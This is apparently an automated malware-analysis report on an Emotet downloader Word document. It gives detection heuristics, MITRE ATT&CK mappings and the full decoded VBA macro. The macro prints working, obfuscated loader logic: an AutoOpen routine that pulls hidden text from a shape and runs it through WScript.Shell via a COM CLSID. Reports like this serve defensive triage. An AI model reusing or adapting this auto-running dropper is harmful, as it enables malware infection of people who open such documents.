MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that instantiate the dangerous COM class 'WScript.Shell', indicating an attempt to execute arbitrary commands. The embedded document body and heuristics reveal obfuscated PowerShell and cmd.exe commands, suggesting the macro is designed to download and execute a second-stage payload. The ClamAV detection as 'Doc.Downloader.Emotet-6826433-0' strongly suggests the Emotet family.
Heuristics 10
-
ClamAV: Doc.Downloader.Emotet-6826433-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826433-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set EGvVqmnoi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + hXuws) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set EGvVqmnoi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + hXuws) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11470 bytes |
SHA-256: 27ada5d9103217c3c967fad4c955583365452c8459ffea93e21ef2909c5e1108 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
150 of 223 identifiers look randomly generated (e.g. 'vUOGvVsqYQkM') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vUOGvVsqYQkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each FCWRV In LAjRzopou
pCfLD = 301675374 + Oct(240613372) - 132434226 - CBool(339684900 / 210804011) * 170102131 + Log(jFuLhY - CLng(64540991)) - 303454242 + Hex(OcdzXcAs)
Next
Select Case UzKmD
Case 165258080
wzLRBSpQz = Cos(111302303)
XoGQiAW = 178318481
Case 176927290
LfRjb = Sqr(305831286 / CSng(76527194 - Cos(189554916 - 4228452) + CVSjZwckw + Rnd(255191871 - 82381179)))
HwdDw = Hex(SKQcw)
End Select
On Error Resume Next
For Each MmmizKA In vacCcVd
nCiub = 244060521 + Oct(187397047) - 196860327 - CBool(175861896 / 38583777) * 204485189 + Log(KlzdqU - CLng(308411827)) - 155879221 + Hex(BcNbT)
Next
Select Case cRIwnu
Case 290106110
TzmzbJIEr = Cos(204452538)
SJdwLHbG = 37748190
Case 251637406
RTIazMS = Sqr(60068572 / CSng(289448829 - Cos(148053442 - 118935475) + ifDVTNuz + Rnd(239011291 - 224372867)))
BBzTwpLom = Hex(sjTqBK)
End Select
On Error Resume Next
For Each CzsjcKD In OHiUzN
XIqpNd = 266281548 + Oct(264333268) - 307865533 - CBool(38475851 / 304363518) * 337173226 + Log(hRckEBiBr - CLng(304050170)) - 267533932 + Hex(tumnBhhmh)
Next
Select Case uNHNuO
Case 61158748
iiLLjzftP = Cos(314740007)
RjOCwTiB = 1753309
Case 299576904
MMKQXOd = Sqr(282756525 / CSng(47044264 - Cos(131176314 - 293731233) + QGhiLpIHR + Rnd(246412339 - 48482134)))
kfLLuL = Hex(JEFVwB)
End Select
On Error Resume Next
For Each jWsTqi In YtOnQKWh
qkCpEJtQS = 10628712 + Oct(82710533) - 281265457 - CBool(241772901 / 8385943) * 76407694 + Log(lRNTkW - CLng(181663663)) - 159372986 + Hex(uUbzSoVcl)
Next
Select Case oILPWccBo
Case 142695812
nsCYisINJ = Cos(134480504)
izJoR = 112133663
Case 340653274
rNzIXG = Sqr(175852978 / CSng(12958919 - Cos(283383665 - 284425981) + VmCuG + Rnd(186136172 - 164438706)))
owMPcYf = Hex(LFiKLBb)
End Select
Set QQYoLYm = Shapes("VbzcjPYLuAc")
On Error Resume Next
For Each oowjaP In UMDpvs
vdJqo = 146863966 + Oct(188920957) - 238442961 - CBool(81767433 / 196084313) * 312374942 + Log(jBWjch - CLng(170142077)) - 46274626 + Hex(uTuUR)
Next
Select Case wYjFklSBZ
Case 318879549
zTpEcS = Cos(262280177)
iKzda = 54128665
Case 141191840
EAJPVXXf = Sqr(76385123 / CSng(209253129 - Cos(162212250 - 73977432) + NAzmOkGR + Rnd(333847149 - 121003009)))
GOiow = Hex(GwOzOAPhs)
End Select
On Error Resume Next
For Each lNccXSjm In JSlpODL
MBiOaCiMi = 19839397 + Oct(318963339) - 23607966 - CBool(278331119 / 217150140) * 180257957 + Log(lXwfiwoz - CLng(43632314)) - 295459061 + Hex(jTFKwUJ)
Next
Select Case FtWLK
Case 299716851
sPjifc = Cos(282237953)
EqFfV = 89632345
Case 85483139
HhjCsZsA = Sqr(231479525 / CSng(215344842 - Cos(171984210 - 147250937) + OMnmOGZO + Rnd(158218377 - 90935472)))
pPBTqoots = Hex(OidqXS)
End Select
On Error Resume Next
For Each jEizwv In iJDiJo
oGGRWNq = 265290317 + Oct(174130143) - 38736227 - CBool(207475944 / 213199742) * 295315743 + Log(DrCzuD - CLng(99345511)) - 28598685 + Hex(DTXjP)
Next
Select Case DDaXbnmw
Case 152601869
ZUsdYRS = Cos(14763289)
bRBjOkHjw = 20062266
Case 335417532
ibDXBFIRc = Sqr(112128763 / CSng(298246183 - Cos(204357830 - 164911025) + iWallA + Rnd(137931084 - 243810349)))
SCULnUEq = Hex(YavtpGWMJ)
End Select
rRQifChaX = "" + wCUQpiRt + nSjTm + QQYoLYm.TextFrame.TextRange.Text + iKvrn + YZJusji + YPsUzMp
On Error Resume Next
For Each iPBvE In moIbrh
TnVPf = 159121973 + Oct(231494338) - 108725059 - CBool(19037783 / 182824768) * 169656186 + Log(EIoiWiQVR - CLng(257444527)) - 169709151 + Hex(VuvJFRC)
Next
Select Case BndkTd
Case 147661545
qrfocBz = Cos(16740351)
JlsaLqjNu = 303538427
Case 238905336
ZKlZKtR = Sqr(202480024 / CSng(25950747 - Cos(71743187 - 299549409) + vfZHlw + Rnd(134240324 - 312393927)))
KwjKnpwzW = Hex(jmrQjuO)
End Select
On Error Resume Next
For Each iJWuRwR In UFTGzk
hOpEva = 107854958 + Oct(52158093) - 131142871 - CBool(157360035 / 266187884) * 214814255 + Log(aijruW - CLng(92235657)) - 136109281 + Hex(pTDtcFbB)
Next
Select Case VjiLrP
Case 100220602
wOBCWd = Cos(102471957)
spVcLaWus = 162735837
Case 145979830
CzKjS = Sqr(43176272 / CSng(125000284 - Cos(340189052 - 238988029) + nUcjZz + Rnd(123689376 - 253932604)))
qoukQF = Hex(FuKnTSt)
End Select
On Error Resume Next
For Each OEZau In LNNNBEmJ
rOlaSiham = 70838509 + Oct(171924264) - 176259336 - CBool(201696757 / 24268391) * 12072080 + Log(ocFjWUaiC - CLng(241783416)) - 218518875 + Hex(OLQnn)
Next
Select Case KpuwM
Case 162667536
imPTMhKL = Cos(86090095)
bhcZXo = 51113737
Case 156263697
BbLaumnc = Sqr(297301610 / CSng(84122969 - Cos(37521102 - 276382110) + jArhKK + Rnd(278702609 - 22664827)))
vBzpGKc = Hex(AmafXFSL)
End Select
Set EGvVqmnoi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + hXuws)
On Error Resume Next
For Each TUKSnYVc In obzitsnPM
QlpSmEUqt = 290746760 + Oct(304136878) - 294562253 - CBool(211636014 / 198194967) * 331240857 + Log(JXHmRhcSX - CLng(303281390)) - 284140651 + Hex(ShhtQQHCi)
Next
Select Case YOThc
Case 239796870
vvVkwiPHZ = Cos(225287006)
IWvrNWYL = 72861436
Case 3823143
PXvTHzt = Sqr(128431312 / CSng(233496515 - Cos(35314610 - 292196268) + bwWOWw + Rnd(118649096 - 251935681)))
iYuHFjBzJ = Hex(ZzTfzo)
End Select
On Error Resume Next
For Each MhFcQX In FPNbPz
QkOtoK = 259794615 + Oct(66093701) - 7386960 - CBool(190806275 / 316802824) * 87671085 + Log(WXmIAiC - CLng(240810546)) - 41937445 + Hex(jtIKoMw)
Next
Select Case rCAYPfK
Case 164486515
ZCjcjDwq = Cos(224866048)
EalwjKL = 228428074
Case 340691506
zwzEGEKa = Sqr(328324029 / CSng(51780673 - Cos(49692347 - 325316090) + wchZwAq + Rnd(81766300 - 131704866)))
krvGF = Hex(ODwLtj)
End Select
On Error Resume Next
For Each lmKpG In jkhwz
QZvWjYow = 247117492 + Oct(81562781) - 176006876 - CBool(123321653 / 222047270) * 58244367 + Log(qqBwCXJQh - CLng(220111751)) - 217666814 + Hex(lmiaUY)
Next
Select Case czHCAKHh
Case 112511966
LrHwMqu = Cos(212609982)
wPHJN = 267675120
Case 18782725
CKDmG = Sqr(303259480 / CSng(303610812 - Cos(213513283 - 293311784) + nBnvpsqV + Rnd(274348841 - 167817911)))
YwntUcY = Hex(otNzFE)
End Select
On Error Resume Next
For Each oOBaAjr In KdnPIV
VRTSW = 253415845 + Oct(268170927) - 66467464 - CBool(75567214 / 187655515) * 28363016 + Log(wiPdSm - CLng(41649557)) - 106572089 + Hex(kHSRkkQvK)
Next
Select Case SKEOiAT
Case 332787008
zDqwwYtju = Cos(338438491)
dCFNkKB = 7588389
Case 246351868
YOBBl = Sqr(4702435 / CSng(297557215 - Cos(102596320 - 242568254) + znPQsuJ + Rnd(146681619 - 298596325)))
AVvpwQErd = Hex(zRNobp)
End Select
Const qjJNirLtbpO = 0
On Error Resume Next
For Each OwqOz In fzGZRzND
OCKMTht = 59782432 + Oct(75297727) - 299264385 - CBool(143650373 / 261733698) * 61602191 + Log(CJjfd - CLng(197907749)) - 291754716 + Hex(NEFSdKZZ)
Next
Select Case DLnOZKwb
Case 181180194
piVdAW = Cos(307345394)
PkSkZ = 235570672
Case 167974131
GHADjjmH = Sqr(120458184 / CSng(187319195 - Cos(146922801 - 278482562) + wjECJDK + Rnd(288240117 - 177414363)))
wjFJo = Hex(TlDojE)
End Select
On Error Resume Next
For Each bawvLkWz In zBAoLjkH
KfWBw = 301238152 + Oct(97756670) - 35217728 - CBool(104522115 / 336084185) * 222930911 + Log(ptPndip - CLng(162161332)) - 16954796 + Hex(kTdHFTQl)
Next
Select Case zuAtjO
Case 166221420
EjGUXPO = Cos(51647407)
lAiAv = 227880365
Case 40805875
vCYoovp = Sqr(202165666 / CSng(212867606 - Cos(226500703 - 209950852) + AiZEEkrw + Rnd(110685778 - 84105759)))
PzwiP = Hex(REMtU)
End Select
On Error Resume Next
For Each FWBOUVaKz In TfrGQSjbj
HkOcH = 114069704 + Oct(213405941) - 164674870 - CBool(161671431 / 235454263) * 196619958 + Log(rXGhnLjL - CLng(105981887)) - 52941852 + Hex(JwMUzoWz)
Next
Select Case aQrUIYHC
Case 273247190
lNQno = Cos(135857159)
ifUsUtzDE = 208912385
Case 307431170
ikCjqEafl = Sqr(166291327 / CSng(96601528 - Cos(28980635 - 213858190) + OWTsIXz + Rnd(327031949 - 37558128)))
fuFWrQDtM = Hex(GRjdZ)
End Select
On Error Resume Next
For Each tVkNBMr In aYrOc
OXbEO = 178576198 + Oct(217509874) - 282956324 - CBool(239606978 / 200054190) * 216480648 + Log(dcIzjm - CLng(23869563)) - 293741710 + Hex(wLSwALPt)
Next
Select Case oMtSSJPb
Case 163328791
oClFjojPr = Cos(176445190)
EKkSQMJIN = 100640691
Case 117682192
CqUUKJzjF = Sqr(90737285 / CSng(42246743 - Cos(25698351 - 228014384) + FlHRwX + Rnd(125838045 - 273222842)))
CJACzGSL = Hex(WFiPMUYF)
End Select
On Error Resume Next
For Each pIVmXZd In LAtnvYlj
pvszNmBi = 246273039 + Oct(275650532) - 91063797 - CBool(287932318 / 80164260) * 168206945 + Log(izBRtKQQ - CLng(276317787)) - 269821246 + Hex(KqIfqzXIZ)
Next
Select Case wYcWTDmj
Case 101183216
waDJvWTpY = Cos(167246065)
CIPbLaGz = 108465529
Case 136196241
AEfaZ = Sqr(313951835 / CSng(173041064 - Cos(43418667 - 197487400) + awzjmwjT + Rnd(198019574 - 217735993)))
zEwQMuId = Hex(jwYvawiV)
End Select
EGvVqmnoi.Run! rRQifChaX, qjJNirLtbpO
On Error Resume Next
For Each tnElVWZ In ZmWCGfvY
hjChWG = 242918805 + Oct(21786782) - 286490541 - CBool(231417435 / 328899832) * 124561618 + Log(VHpzjK - CLng(244332093)) - 88810156 + Hex(wcGUIHb)
Next
Select Case SVGEAQ
Case 186307627
XjTiinbTK = Cos(108490891)
NHwkmw = 79343409
Case 238472644
aBwdbZQ = Sqr(184515074 / CSng(81497961 - Cos(72577722 - 142559868) + NCJiRfqJB + Rnd(260506724 - 66116423)))
sOKTkTFnf = Hex(VVhpG)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.